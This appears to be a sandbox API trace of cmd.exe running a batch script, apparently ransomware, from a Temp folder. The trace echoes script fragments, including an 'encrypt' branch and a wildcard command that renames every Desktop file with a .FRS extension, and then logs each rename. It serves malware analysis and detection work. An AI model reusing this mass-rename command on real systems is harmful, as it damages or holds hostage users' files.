1 [0035.156] _get_osfhandle (_FileHandle=1) returned 0x28 [0035.156] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x12b5154 | out: lpMode=0x12b5154) returned 1 [0035.156] _get_osfhandle (_FileHandle=0) returned 0x24 [0035.156] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x12b5150 | out: lpMode=0x12b5150) returned 1 [0035.156] SetConsoleInputExeNameW () returned 0x1 [0035.156] GetConsoleOutputCP () returned 0x1b5 [0035.157] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x12b5200 | out: lpCPInfo=0x12b5200) returned 1 [0035.157] SetThreadUILanguage (LangId=0x0) returned 0x409 [0035.157] CreateFileW (lpFileName="C:\\Users\\5JGHKO~1\\AppData\\Local\\Temp\\CCEP00EL.bat" (normalized: "c:\\users\\5jghko~1\\appdata\\local\\temp\\ccep00el.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0xc8f200, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x94 [0035.157] _open_osfhandle (_OSFileHandle=0x94, _Flags=8) returned 3 [0035.157] _get_osfhandle (_FileHandle=3) returned 0x94 [0035.157] SetFilePointer (in: hFile=0x94, lDistanceToMove=135, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x87 [0035.157] _get_osfhandle (_FileHandle=3) returned 0x94 [0035.157] SetFilePointer (in: hFile=0x94, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x87 [0035.157] ReadFile (in: hFile=0x94, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0xc8f1c4, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8f1c4*=0x9e7, lpOverlapped=0x0) returned 1 [0035.157] SetFilePointer (in: hFile=0x94, lDistanceToMove=143, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x8f [0035.157] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=8, lpWideCharStr=0x12bc840, cchWideChar=8191 | out: lpWideCharStr="goto 2\r\n\\\"==\\\"encrypt\\\" goto 3\r\ne\" \"C:\\FRS_TEMP\\temp.txt\"')do set n=%%i\r\n") returned 8 [0035.158] _get_osfhandle (_FileHandle=3) returned 0x94 [0035.158] GetFileType (hFile=0x94) returned 0x1 [0035.158] _get_osfhandle (_FileHandle=3) returned 0x94 [0035.158] SetFilePointer (in: hFile=0x94, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8f [0035.158] _wcsicmp (_String1="goto", _String2=")") returned 62 [0035.158] _wcsicmp (_String1="FOR", _String2="goto") returned -1 [0035.158] _wcsicmp (_String1="FOR/?", _String2="goto") returned -1 [0035.158] _wcsicmp (_String1="IF", _String2="goto") returned 2 [0035.158] _wcsicmp (_String1="IF/?", _String2="goto") returned 2 [0035.158] _wcsicmp (_String1="REM", _String2="goto") returned 11 [0035.158] _wcsicmp (_String1="REM/?", _String2="goto") returned 11 [0035.158] _tell (_FileHandle=3) returned 143 [0035.158] _close (_FileHandle=3) returned 0 [0035.159] _wcsicmp (_String1="goto", _String2="DIR") returned 3 [0035.159] _wcsicmp (_String1="goto", _String2="ERASE") returned 2 [0035.159] _wcsicmp (_String1="goto", _String2="DEL") returned 3 [0035.159] _wcsicmp (_String1="goto", _String2="TYPE") returned -13 [0035.159] _wcsicmp (_String1="goto", _String2="COPY") returned 4 [0035.159] _wcsicmp (_String1="goto", _String2="CD") returned 4 [0035.159] _wcsicmp (_String1="goto", _String2="CHDIR") returned 4 [0035.159] _wcsicmp (_String1="goto", _String2="RENAME") returned -11 [0035.159] _wcsicmp (_String1="goto", _String2="REN") returned -11 [0035.159] _wcsicmp (_String1="goto", _String2="ECHO") returned 2 [0035.159] _wcsicmp (_String1="goto", _String2="SET") returned -12 [0035.159] _wcsicmp (_String1="goto", _String2="PAUSE") returned -9 [0035.159] _wcsicmp (_String1="goto", _String2="DATE") returned 3 [0035.159] _wcsicmp (_String1="goto", _String2="TIME") returned -13 [0035.159] _wcsicmp (_String1="goto", _String2="PROMPT") returned -9 [0035.159] _wcsicmp (_String1="goto", _String2="MD") returned -6 [0035.159] _wcsicmp (_String1="goto", _String2="MKDIR") returned -6 [0035.159] _wcsicmp (_String1="goto", _String2="RD") returned -11 [0035.159] _wcsicmp (_String1="goto", _String2="RMDIR") returned -11 [0035.159] _wcsicmp (_String1="goto", _String2="PATH") returned -9 [0035.159] _wcsicmp (_String1="goto", _String2="GOTO") returned 0 [0035.159] GetConsoleTitleW (in: lpConsoleTitle=0xc8edb0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\SYSTEM32\\cmd.exe") returned 0x1b [0035.159] _wcsicmp (_String1="goto", _String2="DIR") returned 3 [0035.159] _wcsicmp (_String1="goto", _String2="ERASE") returned 2 [0035.159] _wcsicmp (_String1="goto", _String2="DEL") returned 3 [0035.159] _wcsicmp (_String1="goto", _String2="TYPE") returned -13 [0035.159] _wcsicmp (_String1="goto", _String2="COPY") returned 4 [0035.160] _wcsicmp (_String1="goto", _String2="CD") returned 4 [0035.160] _wcsicmp (_String1="goto", _String2="CHDIR") returned 4 [0035.160] _wcsicmp (_String1="goto", _String2="RENAME") returned -11 [0035.160] _wcsicmp (_String1="goto", _String2="REN") returned -11 [0035.160] _wcsicmp (_String1="goto", _String2="ECHO") returned 2 [0035.160] _wcsicmp (_String1="goto", _String2="SET") returned -12 [0035.160] _wcsicmp (_String1="goto", _String2="PAUSE") returned -9 [0035.160] _wcsicmp (_String1="goto", _String2="DATE") returned 3 [0035.160] _wcsicmp (_String1="goto", _String2="TIME") returned -13 [0035.160] _wcsicmp (_String1="goto", _String2="PROMPT") returned -9 [0035.160] _wcsicmp (_String1="goto", _String2="MD") returned -6 [0035.160] _wcsicmp (_String1="goto", _String2="MKDIR") returned -6 [0035.160] _wcsicmp (_String1="goto", _String2="RD") returned -11 [0035.160] _wcsicmp (_String1="goto", _String2="RMDIR") returned -11 [0035.160] _wcsicmp (_String1="goto", _String2="PATH") returned -9 [0035.160] _wcsicmp (_String1="goto", _String2="GOTO") returned 0 [0035.160] CreateFileW (lpFileName="C:\\Users\\5JGHKO~1\\AppData\\Local\\Temp\\CCEP00EL.bat" (normalized: "c:\\users\\5jghko~1\\appdata\\local\\temp\\ccep00el.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0xc8eb00, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x94 [0035.160] _open_osfhandle (_OSFileHandle=0x94, _Flags=8) returned 3 [0035.160] _get_osfhandle (_FileHandle=3) returned 0x94 [0035.160] SetFilePointer (in: hFile=0x94, lDistanceToMove=143, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x8f [0035.160] _get_osfhandle (_FileHandle=3) returned 0x94 [0035.160] GetFileSize (in: hFile=0x94, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xa6e [0035.160] _wcsnicmp (_String1="2", _String2=":EOF", _MaxCount=0x4) returned -8 [0035.160] _get_osfhandle (_FileHandle=3) returned 0x94 [0035.160] SetFilePointer (in: hFile=0x94, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8f [0035.161] _get_osfhandle (_FileHandle=3) returned 0x94 [0035.161] GetFileType (hFile=0x94) returned 0x1 [0035.161] SetFilePointer (in: hFile=0x94, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8f [0035.161] ReadFile (in: hFile=0x94, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8eb6c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8eb6c*=0x200, lpOverlapped=0x0) returned 1 [0035.161] SetFilePointer (in: hFile=0x94, lDistanceToMove=145, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x91 [0035.161] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=2, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="\r\n") returned 2 [0035.161] _get_osfhandle (_FileHandle=3) returned 0x94 [0035.161] SetFilePointer (in: hFile=0x94, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x91 [0035.161] _get_osfhandle (_FileHandle=3) returned 0x94 [0035.161] GetFileType (hFile=0x94) returned 0x1 [0035.161] SetFilePointer (in: hFile=0x94, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x91 [0035.161] ReadFile (in: hFile=0x94, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8eb6c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8eb6c*=0x200, lpOverlapped=0x0) returned 1 [0035.161] SetFilePointer (in: hFile=0x94, lDistanceToMove=149, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x95 [0035.161] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=4, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr=":2\r\n") returned 4 [0035.161] _wcsicmp (_String1="2", _String2="2") returned 0 [0035.161] _close (_FileHandle=3) returned 0 [0035.161] _get_osfhandle (_FileHandle=1) returned 0x28 [0035.161] SetConsoleMode (hConsoleHandle=0x28, dwMode=0x3) returned 1 [0035.161] _get_osfhandle (_FileHandle=1) returned 0x28 [0035.161] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x12b5154 | out: lpMode=0x12b5154) returned 1 [0035.162] _get_osfhandle (_FileHandle=0) returned 0x24 [0035.162] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x12b5150 | out: lpMode=0x12b5150) returned 1 [0035.162] SetConsoleInputExeNameW () returned 0x1 [0035.162] GetConsoleOutputCP () returned 0x1b5 [0035.162] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x12b5200 | out: lpCPInfo=0x12b5200) returned 1 [0035.162] SetThreadUILanguage (LangId=0x0) returned 0x409 [0035.162] CreateFileW (lpFileName="C:\\Users\\5JGHKO~1\\AppData\\Local\\Temp\\CCEP00EL.bat" (normalized: "c:\\users\\5jghko~1\\appdata\\local\\temp\\ccep00el.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0xc8f200, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x94 [0035.163] _open_osfhandle (_OSFileHandle=0x94, _Flags=8) returned 3 [0035.163] _get_osfhandle (_FileHandle=3) returned 0x94 [0035.163] SetFilePointer (in: hFile=0x94, lDistanceToMove=149, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x95 [0035.163] _get_osfhandle (_FileHandle=3) returned 0x94 [0035.163] SetFilePointer (in: hFile=0x94, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x95 [0035.163] ReadFile (in: hFile=0x94, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0xc8f1c4, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8f1c4*=0x9d9, lpOverlapped=0x0) returned 1 [0035.163] SetFilePointer (in: hFile=0x94, lDistanceToMove=196, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xc4 [0035.163] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=47, lpWideCharStr=0x12bc840, cchWideChar=8191 | out: lpWideCharStr="ren \"C:\\Users\\%USERNAME%\\Desktop\\*.*\" *.*.FRS\r\n\\temp.txt\"')do set n=%%i\r\n") returned 47 [0035.163] _get_osfhandle (_FileHandle=3) returned 0x94 [0035.163] GetFileType (hFile=0x94) returned 0x1 [0035.163] _get_osfhandle (_FileHandle=3) returned 0x94 [0035.163] SetFilePointer (in: hFile=0x94, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xc4 [0035.163] GetEnvironmentVariableW (in: lpName="USERNAME", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="5JgHKoaOfdp") returned 0xb [0035.163] _wcsicmp (_String1="ren", _String2=")") returned 73 [0035.164] _wcsicmp (_String1="FOR", _String2="ren") returned -12 [0035.164] _wcsicmp (_String1="FOR/?", _String2="ren") returned -12 [0035.164] _wcsicmp (_String1="IF", _String2="ren") returned -9 [0035.164] _wcsicmp (_String1="IF/?", _String2="ren") returned -9 [0035.164] _wcsicmp (_String1="REM", _String2="ren") returned -1 [0035.164] _wcsicmp (_String1="REM/?", _String2="ren") returned -1 [0035.164] _tell (_FileHandle=3) returned 196 [0035.164] _close (_FileHandle=3) returned 0 [0035.164] _wcsicmp (_String1="ren", _String2="DIR") returned 14 [0035.164] _wcsicmp (_String1="ren", _String2="ERASE") returned 13 [0035.164] _wcsicmp (_String1="ren", _String2="DEL") returned 14 [0035.164] _wcsicmp (_String1="ren", _String2="TYPE") returned -2 [0035.164] _wcsicmp (_String1="ren", _String2="COPY") returned 15 [0035.164] _wcsicmp (_String1="ren", _String2="CD") returned 15 [0035.164] _wcsicmp (_String1="ren", _String2="CHDIR") returned 15 [0035.164] _wcsicmp (_String1="ren", _String2="RENAME") returned -97 [0035.164] _wcsicmp (_String1="ren", _String2="REN") returned 0 [0035.164] GetConsoleTitleW (in: lpConsoleTitle=0xc8edb0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\SYSTEM32\\cmd.exe") returned 0x1b [0035.165] _wcsicmp (_String1="ren", _String2="DIR") returned 14 [0035.165] _wcsicmp (_String1="ren", _String2="ERASE") returned 13 [0035.165] _wcsicmp (_String1="ren", _String2="DEL") returned 14 [0035.165] _wcsicmp (_String1="ren", _String2="TYPE") returned -2 [0035.165] _wcsicmp (_String1="ren", _String2="COPY") returned 15 [0035.165] _wcsicmp (_String1="ren", _String2="CD") returned 15 [0035.165] _wcsicmp (_String1="ren", _String2="CHDIR") returned 15 [0035.165] _wcsicmp (_String1="ren", _String2="RENAME") returned -97 [0035.165] _wcsicmp (_String1="ren", _String2="REN") returned 0 [0035.165] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0035.165] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0035.165] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0xc8eb68, nVolumeNameSize=0x104, lpVolumeSerialNumber=0xc8eb60, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0xc8eb60*=0xba2ee5af, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0035.166] _wcsicmp (_String1="*.*", _String2=".") returned -4 [0035.166] _wcsicmp (_String1="*.*", _String2="..") returned -4 [0035.166] GetFileAttributesW (lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\*.*" (normalized: "c:\\users\\5jghkoaofdp\\desktop\\*.*")) returned 0xffffffff [0035.166] GetLastError () returned 0x7b [0035.166] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0xd18240 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop") returned 0x1c [0035.166] SetErrorMode (uMode=0x0) returned 0x0 [0035.166] SetErrorMode (uMode=0x1) returned 0x0 [0035.166] GetFullPathNameW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\*.*", nBufferLength=0x104, lpBuffer=0xc8e4f8, lpFilePart=0xc8e4cc | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop\\*.*", lpFilePart=0xc8e4cc*="*.*") returned 0x20 [0035.166] SetErrorMode (uMode=0x0) returned 0x1 [0035.166] GetFileAttributesW (lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop" (normalized: "c:\\users\\5jghkoaofdp\\desktop")) returned 0x11 [0035.166] _wcsicmp (_String1="*.*", _String2=".") returned -4 [0035.166] _wcsicmp (_String1="*.*", _String2="..") returned -4 [0035.166] GetFileAttributesW (lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\*.*" (normalized: "c:\\users\\5jghkoaofdp\\desktop\\*.*")) returned 0xffffffff [0035.166] GetLastError () returned 0x7b [0035.166] FindFirstFileExW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\*.*", fInfoLevelId=0x1, lpFindFileData=0xd17fe0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xd17fe0) returned 0xd27338 [0035.166] FindNextFileW (in: hFindFile=0xd27338, lpFindFileData=0xd17fe0 | out: lpFindFileData=0xd17fe0) returned 1 [0035.167] FindNextFileW (in: hFindFile=0xd27338, lpFindFileData=0xd17fe0 | out: lpFindFileData=0xd17fe0) returned 1 [0035.167] MoveFileWithProgressW (lpExistingFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\-TWyIUcq0.m4a" (normalized: "c:\\users\\5jghkoaofdp\\desktop\\-twyiucq0.m4a"), lpNewFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\-TWyIUcq0.m4a.FRS" (normalized: "c:\\users\\5jghkoaofdp\\desktop\\-twyiucq0.m4a.frs"), lpProgressRoutine=0x0, lpData=0x0, dwFlags=0x2) returned 1 [0035.167] FindNextFileW (in: hFindFile=0xd27338, lpFindFileData=0xd17fe0 | out: lpFindFileData=0xd17fe0) returned 1 [0035.167] MoveFileWithProgressW (lpExistingFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\43r71_L4m.mp4" (normalized: "c:\\users\\5jghkoaofdp\\desktop\\43r71_l4m.mp4"), lpNewFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\43r71_L4m.mp4.FRS" (normalized: "c:\\users\\5jghkoaofdp\\desktop\\43r71_l4m.mp4.frs"), lpProgressRoutine=0x0, lpData=0x0, dwFlags=0x2) returned 1 [0035.168] FindNextFileW (in: hFindFile=0xd27338, lpFindFileData=0xd17fe0 | out: lpFindFileData=0xd17fe0) returned 1 [0035.168] MoveFileWithProgressW (lpExistingFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\6EivHQj738.wav" (normalized: "c:\\users\\5jghkoaofdp\\desktop\\6eivhqj738.wav"), lpNewFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\6EivHQj738.wav.FRS" (normalized: "c:\\users\\5jghkoaofdp\\desktop\\6eivhqj738.wav.frs"), lpProgressRoutine=0x0, lpData=0x0, dwFlags=0x2) returned 1 [0035.168] FindNextFileW (in: hFindFile=0xd27338, lpFindFileData=0xd17fe0 | out: lpFindFileData=0xd17fe0) returned 1 [0035.168] FindNextFileW (in: hFindFile=0xd27338, lpFindFileData=0xd17fe0 | out: lpFindFileData=0xd17fe0) returned 1 [0035.168] MoveFileWithProgressW (lpExistingFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\72iMq3oNH06hn.mp4" (normalized: "c:\\users\\5jghkoaofdp\\desktop\\72imq3onh06hn.mp4"), lpNewFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\72iMq3oNH06hn.mp4.FRS" (normalized: "c:\\users\\5jghkoaofdp\\desktop\\72imq3onh06hn.mp4.frs"), lpProgressRoutine=0x0, lpData=0x0, dwFlags=0x2) returned 1 [0035.168] FindNextFileW (in: hFindFile=0xd27338, lpFindFileData=0xd17fe0 | out: lpFindFileData=0xd17fe0) returned 1 [0035.169] MoveFileWithProgressW (lpExistingFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\7HyTMOfQ-a8mF.ods" (normalized: "c:\\users\\5jghkoaofdp\\desktop\\7hytmofq-a8mf.ods"), lpNewFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\7HyTMOfQ-a8mF.ods.FRS" (normalized: "c:\\users\\5jghkoaofdp\\desktop\\7hytmofq-a8mf.ods.frs"), lpProgressRoutine=0x0, lpData=0x0, dwFlags=0x2) returned 1 [0035.169] FindNextFileW (in: hFindFile=0xd27338, lpFindFileData=0xd17fe0 | out: lpFindFileData=0xd17fe0) returned 1 [0035.169] MoveFileWithProgressW (lpExistingFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\B-t7yDezo3M.png" (normalized: "c:\\users\\5jghkoaofdp\\desktop\\b-t7ydezo3m.png"), lpNewFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\B-t7yDezo3M.png.FRS" (normalized: "c:\\users\\5jghkoaofdp\\desktop\\b-t7ydezo3m.png.frs"), lpProgressRoutine=0x0, lpData=0x0, dwFlags=0x2) returned 1 [0035.169] FindNextFileW (in: hFindFile=0xd27338, lpFindFileData=0xd17fe0 | out: lpFindFileData=0xd17fe0) returned 1 [0035.169] FindNextFileW (in: hFindFile=0xd27338, lpFindFileData=0xd17fe0 | out: lpFindFileData=0xd17fe0) returned 1 [0035.169] FindNextFileW (in: hFindFile=0xd27338, lpFindFileData=0xd17fe0 | out: lpFindFileData=0xd17fe0) returned 1 [0035.169] FindNextFileW (in: hFindFile=0xd27338, lpFindFileData=0xd17fe0 | out: lpFindFileData=0xd17fe0) returned 1 [0035.169] MoveFileWithProgressW (lpExistingFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\FRS.exe" (normalized: "c:\\users\\5jghkoaofdp\\desktop\\frs.exe"), lpNewFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\FRS.exe.FRS" (normalized: "c:\\users\\5jghkoaofdp\\desktop\\frs.exe.frs"), lpProgressRoutine=0x0, lpData=0x0, dwFlags=0x2) returned 1 [0035.170] FindNextFileW (in: hFindFile=0xd27338, lpFindFileData=0xd17fe0 | out: lpFindFileData=0xd17fe0) returned 1 [0035.170] MoveFileWithProgressW (lpExistingFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\f_JdlbY.rtf" (normalized: "c:\\users\\5jghkoaofdp\\desktop\\f_jdlby.rtf"), lpNewFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\f_JdlbY.rtf.FRS" (normalized: "c:\\users\\5jghkoaofdp\\desktop\\f_jdlby.rtf.frs"), lpProgressRoutine=0x0, lpData=0x0, dwFlags=0x2) returned 1 [0035.170] FindNextFileW (in: hFindFile=0xd27338, lpFindFileData=0xd17fe0 | out: lpFindFileData=0xd17fe0) returned 1 [0035.170] MoveFileWithProgressW (lpExistingFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\g3S4_wn8bNWcu.mp4" (normalized: "c:\\users\\5jghkoaofdp\\desktop\\g3s4_wn8bnwcu.mp4"), lpNewFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\g3S4_wn8bNWcu.mp4.FRS" (normalized: "c:\\users\\5jghkoaofdp\\desktop\\g3s4_wn8bnwcu.mp4.frs"), lpProgressRoutine=0x0, lpData=0x0, dwFlags=0x2) returned 1 [0035.176] FindNextFileW (in: hFindFile=0xd27338, lpFindFileData=0xd17fe0 | out: lpFindFileData=0xd17fe0) returned 1 [0035.176] MoveFileWithProgressW (lpExistingFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\GUTLH6thWjyjtPP.ppt" (normalized: "c:\\users\\5jghkoaofdp\\desktop\\gutlh6thwjyjtpp.ppt"), lpNewFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\GUTLH6thWjyjtPP.ppt.FRS" (normalized: "c:\\users\\5jghkoaofdp\\desktop\\gutlh6thwjyjtpp.ppt.frs"), lpProgressRoutine=0x0, lpData=0x0, dwFlags=0x2) returned 1 [0035.177] FindNextFileW (in: hFindFile=0xd27338, lpFindFileData=0xd17fe0 | out: lpFindFileData=0xd17fe0) returned 1 [0035.177] MoveFileWithProgressW (lpExistingFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\HxGDqRidEx_PFzYh_fbr.odt" (normalized: "c:\\users\\5jghkoaofdp\\desktop\\hxgdqridex_pfzyh_fbr.odt"), lpNewFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\HxGDqRidEx_PFzYh_fbr.odt.FRS" (normalized: "c:\\users\\5jghkoaofdp\\desktop\\hxgdqridex_pfzyh_fbr.odt.frs"), lpProgressRoutine=0x0, lpData=0x0, dwFlags=0x2) returned 1 [0035.186] FindNextFileW (in: hFindFile=0xd27338, lpFindFileData=0xd17fe0 | out: lpFindFileData=0xd17fe0) returned 1 [0035.186] MoveFileWithProgressW (lpExistingFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\IW7VeAA.gif" (normalized: "c:\\users\\5jghkoaofdp\\desktop\\iw7veaa.gif"), lpNewFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\IW7VeAA.gif.FRS" (normalized: "c:\\users\\5jghkoaofdp\\desktop\\iw7veaa.gif.frs"), lpProgressRoutine=0x0, lpData=0x0, dwFlags=0x2) returned 1 [0035.186] FindNextFileW (in: hFindFile=0xd27338, lpFindFileData=0xd17fe0 | out: lpFindFileData=0xd17fe0) returned 1 [0035.186] MoveFileWithProgressW (lpExistingFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\jBwZGAoQv2ah.flv" (normalized: "c:\\users\\5jghkoaofdp\\desktop\\jbwzgaoqv2ah.flv"), lpNewFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\jBwZGAoQv2ah.flv.FRS" (normalized: "c:\\users\\5jghkoaofdp\\desktop\\jbwzgaoqv2ah.flv.frs"), lpProgressRoutine=0x0, lpData=0x0, dwFlags=0x2) returned 1 [0035.186] FindNextFileW (in: hFindFile=0xd27338, lpFindFileData=0xd17fe0 | out: lpFindFileData=0xd17fe0) returned 1 [0035.187] MoveFileWithProgressW (lpExistingFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\j_3Z6ryQ7L9U.m4a" (normalized: "c:\\users\\5jghkoaofdp\\desktop\\j_3z6ryq7l9u.m4a"), lpNewFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\j_3Z6ryQ7L9U.m4a.FRS" (normalized: "c:\\users\\5jghkoaofdp\\desktop\\j_3z6ryq7l9u.m4a.frs"), lpProgressRoutine=0x0, lpData=0x0, dwFlags=0x2) returned 1 [0035.187] FindNextFileW (in: hFindFile=0xd27338, lpFindFileData=0xd17fe0 | out: lpFindFileData=0xd17fe0) returned 1 [0035.187] MoveFileWithProgressW (lpExistingFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\k5gVz.wav" (normalized: "c:\\users\\5jghkoaofdp\\desktop\\k5gvz.wav"), lpNewFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\k5gVz.wav.FRS" (normalized: "c:\\users\\5jghkoaofdp\\desktop\\k5gvz.wav.frs"), lpProgressRoutine=0x0, lpData=0x0, dwFlags=0x2) returned 1 [0035.187] FindNextFileW (in: hFindFile=0xd27338, lpFindFileData=0xd17fe0 | out: lpFindFileData=0xd17fe0) returned 1 [0035.187] MoveFileWithProgressW (lpExistingFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\o0EPrPCoRNi4z.pdf" (normalized: "c:\\users\\5jghkoaofdp\\desktop\\o0eprpcorni4z.pdf"), lpNewFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\o0EPrPCoRNi4z.pdf.FRS" (normalized: "c:\\users\\5jghkoaofdp\\desktop\\o0eprpcorni4z.pdf.frs"), lpProgressRoutine=0x0, lpData=0x0, dwFlags=0x2) returned 1 [0035.187] FindNextFileW (in: hFindFile=0xd27338, lpFindFileData=0xd17fe0 | out: lpFindFileData=0xd17fe0) returned 1 [0035.188] MoveFileWithProgressW (lpExistingFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\OU5cAUoh-hbI.mkv" (normalized: "c:\\users\\5jghkoaofdp\\desktop\\ou5cauoh-hbi.mkv"), lpNewFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\OU5cAUoh-hbI.mkv.FRS" (normalized: "c:\\users\\5jghkoaofdp\\desktop\\ou5cauoh-hbi.mkv.frs"), lpProgressRoutine=0x0, lpData=0x0, dwFlags=0x2) returned 1 [0035.188] FindNextFileW (in: hFindFile=0xd27338, lpFindFileData=0xd17fe0 | out: lpFindFileData=0xd17fe0) returned 1 [0035.188] MoveFileWithProgressW (lpExistingFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\OumVIgDYioU8ucWTila.flv" (normalized: "c:\\users\\5jghkoaofdp\\desktop\\oumvigdyiou8ucwtila.flv"), lpNewFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\OumVIgDYioU8ucWTila.flv.FRS" (normalized: "c:\\users\\5jghkoaofdp\\desktop\\oumvigdyiou8ucwtila.flv.frs"), 